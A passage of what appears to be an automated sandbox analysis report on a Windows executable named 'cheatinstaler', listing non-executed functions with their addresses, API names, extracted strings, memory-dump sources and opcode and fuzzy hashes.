                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 1611563598-0
                                                                                  • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                  • Instruction ID: 0e1cd44f0b955c1791750d9c7b1596fe66366bd18d24044955961425e50f9a54
                                                                                  • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                  • Instruction Fuzzy Hash: B0C08C20F05502C1EA08AF27C8D942823A4FB40B04FB84034D10C81160CE2CC6EAA365

                                                                                  Non-executed Functions

                                                                                  Function 00007FF75454C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                  • API String ID: 2659423929-3508440684
                                                                                  • Opcode ID: 86f3f34dae19e3e49c29d340f54b39a2d4150e9680d4af69a4817d617f67abfd
                                                                                  • Instruction ID: 0dc1ee152999734ab242c4cd2f5d59c0bba245e55da53fcc1c7e0eccd9b7f0d6
                                                                                  • Opcode Fuzzy Hash: 86f3f34dae19e3e49c29d340f54b39a2d4150e9680d4af69a4817d617f67abfd
                                                                                  • Instruction Fuzzy Hash: A362C462F1874285FB00EF76D4A42BDA371EB857A4FA84231DA6D57AD6DF38E184C310
                                                                                  Function 00007FF754551A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                  • String ID: rtmp
                                                                                  • API String ID: 3587137053-870060881
                                                                                  • Opcode ID: e1af406d9dd90cab9ebde2dc7b257a9c18519fdc4ea1c1791790fdf5b4aa1268
                                                                                  • Instruction ID: b0686a66eff674c228ffdaf2ffacdf33ed8a5cea148844b057536b47d45babe5
                                                                                  • Opcode Fuzzy Hash: e1af406d9dd90cab9ebde2dc7b257a9c18519fdc4ea1c1791790fdf5b4aa1268
                                                                                  • Instruction Fuzzy Hash: 9EF1C322F08A4291EA10EF66D4E41FDAB61FB853D4F981131FA4D47AA9EF3CD584C760
                                                                                  Function 00007FF754555B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1693479884-0
                                                                                  • Opcode ID: 42882c5e1b64cf364603feffb0a4dffa6fd5e54fa856c7804417c031547eb997
                                                                                  • Instruction ID: 38035251a9565e33b4ebdc116d7142fb6ee6512a13d6c5ce3f99e681167273a7
                                                                                  • Opcode Fuzzy Hash: 42882c5e1b64cf364603feffb0a4dffa6fd5e54fa856c7804417c031547eb997
                                                                                  • Instruction Fuzzy Hash: D3A1B562F15B5684FE10EF7AD8A42BCA361AF45BE4B984231EE1D17BD9DE3CE041C210
                                                                                  Function 00007FF754573170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3140674995-0
                                                                                  • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                  • Instruction ID: cca9566a1e1ae471e8c56b011f05716ca96d1fd354abff7d6e49c0e2fa483af1
                                                                                  • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                  • Instruction Fuzzy Hash: 58313272609B818AEB609F65E8A03EDB364FB84754F984439DB4D47B98DF38D648C720
                                                                                  Function 00007FF7545776D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1239891234-0
                                                                                  • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                  • Instruction ID: 8bf847a311ebbfd892a4814d6b86ad2920bc271daa0cd0153084d9396645308a
                                                                                  • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                  • Instruction Fuzzy Hash: 39316332608F8186E760DF26EC902AEB7A4FB84794F980135EA9D43B59DF3CD655CB10
                                                                                  Function 00007FF754541AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 47fe9767bcb5ae1d9a882eaa5a8596545d0350934ab6dbf56b44417d7b0c6152
                                                                                  • Instruction ID: e743fbd67c9187ee4f17789bd9cac3c2473acc29ac9300f5a5ed2d29b56f16e3
                                                                                  • Opcode Fuzzy Hash: 47fe9767bcb5ae1d9a882eaa5a8596545d0350934ab6dbf56b44417d7b0c6152
                                                                                  • Instruction Fuzzy Hash: 28B1E562F1468655EB10AF66D8A82EDA361FF857D4FA81231EA4D0BB99EF3CD540C310
                                                                                  Function 00007FF75457FA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF75457FAC4
                                                                                    • Part of subcall function 00007FF754577934: GetCurrentProcess.KERNEL32(00007FF754580CCD), ref: 00007FF754577961
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                  • String ID: *?$.
                                                                                  • API String ID: 2518042432-3972193922
                                                                                  • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                  • Instruction ID: b218fd85d9f10b5ad527d349813fed48917fdc5fcb62e979359f47532da4f582
                                                                                  • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                  • Instruction Fuzzy Hash: AB51D663B15A5585EB10EFA398A04BDA7A4FB44BD4B984531EE1D17B89DE3CD1428320
                                                                                  Function 00007FF75454B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1365068426-0
                                                                                  • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                  • Instruction ID: 43bdbb56bb29e37bac986ad44014222150a14d753d33bf86625af0bd0a5e4b18
                                                                                  • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                  • Instruction Fuzzy Hash: FA01FF75A0C74282EB10AF63B8A417AA395FB89BC0F9C4034EA8D47B45DE3CE5059751
                                                                                  Function 00007FF75457FCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .
                                                                                  • API String ID: 0-248832578
                                                                                  • Opcode ID: c6a507b225cd4218212adc004c755bbf20f968de81e7d05236a270c9e1509e97
                                                                                  • Instruction ID: e66cc17128f300c50af4eb6a5e0506622953af3512c20d960eff51dbdbc45fb0
                                                                                  • Opcode Fuzzy Hash: c6a507b225cd4218212adc004c755bbf20f968de81e7d05236a270c9e1509e97
                                                                                  • Instruction Fuzzy Hash: 82310A23B1869145F760EF3798557B9BA91BB54BE4F988235EE5C07BCACE3CD6028300
                                                                                  Function 00007FF75456A2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                  • String ID:
                                                                                  • API String ID: 2169056816-0
                                                                                  • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                  • Instruction ID: 9b91340b05f6513641ce2724a692662322bf815381abba47340269a78210a545
                                                                                  • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                  • Instruction Fuzzy Hash: 87116D32A18B81A5E761AF22F8A07EAB360FF88B84FC84135EA4D07654DF3CE145C754
                                                                                  Function 00007FF7545551A4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                  • Instruction ID: 82432e8128796d610442fa917e08785c7a67ff035283479019f4c8dfe44b2411
                                                                                  • Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                  • Instruction Fuzzy Hash: B00117729185468AF624EF02E8A077AB3A1FB98754FD80234E65D47794DF3CE4008F20
                                                                                  Function 00007FF754580D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapProcess
                                                                                  • String ID:
                                                                                  • API String ID: 54951025-0
                                                                                  • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                  • Instruction ID: fe8226f99b94ce971c195f430a5110009d9af925ae241f950b858da053eb95d8
                                                                                  • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                  • Instruction Fuzzy Hash: 14B09230E17A02C2EA083F576CE225862A4BF48701FE89038C10C41320DE2C20A54720
                                                                                  Function 00007FF7545858E0 Relevance: .0, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                  • Instruction ID: c2a9d2af5af6d658cb94327c14628da977862dbfc6c7428c087e82895be42551
                                                                                  • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                  • Instruction Fuzzy Hash: 5EF09C727182658BDFA4DF2EA49262D77D0F7483C0FD48439D68D83B04DA3C94509F24
                                                                                  Function 00007FF75454D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                  • API String ID: 3668304517-727060406
                                                                                  • Opcode ID: 2f19ab4c30c8eac6d144c901c4549240b956f6a692c877d1095a563e450749ff
                                                                                  • Instruction ID: f0403c7fac5e8bb9823db6e6cd431e4f2179b9118be42358c91e64bd52caff94
                                                                                  • Opcode Fuzzy Hash: 2f19ab4c30c8eac6d144c901c4549240b956f6a692c877d1095a563e450749ff
                                                                                  • Instruction Fuzzy Hash: 18410736B06F0199FB10AF62E4A03EC73A5FB58798F980136DA4C47B68EE38D159C350
                                                                                  Function 00007FF754572A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                  • API String ID: 2565136772-3242537097
                                                                                  • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                  • Instruction ID: f7ce3aa3df1d2276ed8b0e2b0f90241344061d4334f5ecc99d58aa706973b616
                                                                                  • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                  • Instruction Fuzzy Hash: 7521D865E19A0782FA69BF53A8F5174B3A1FF44B81FDC1035E94E026A5DE3CA549C320
                                                                                  Function 00007FF754556A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
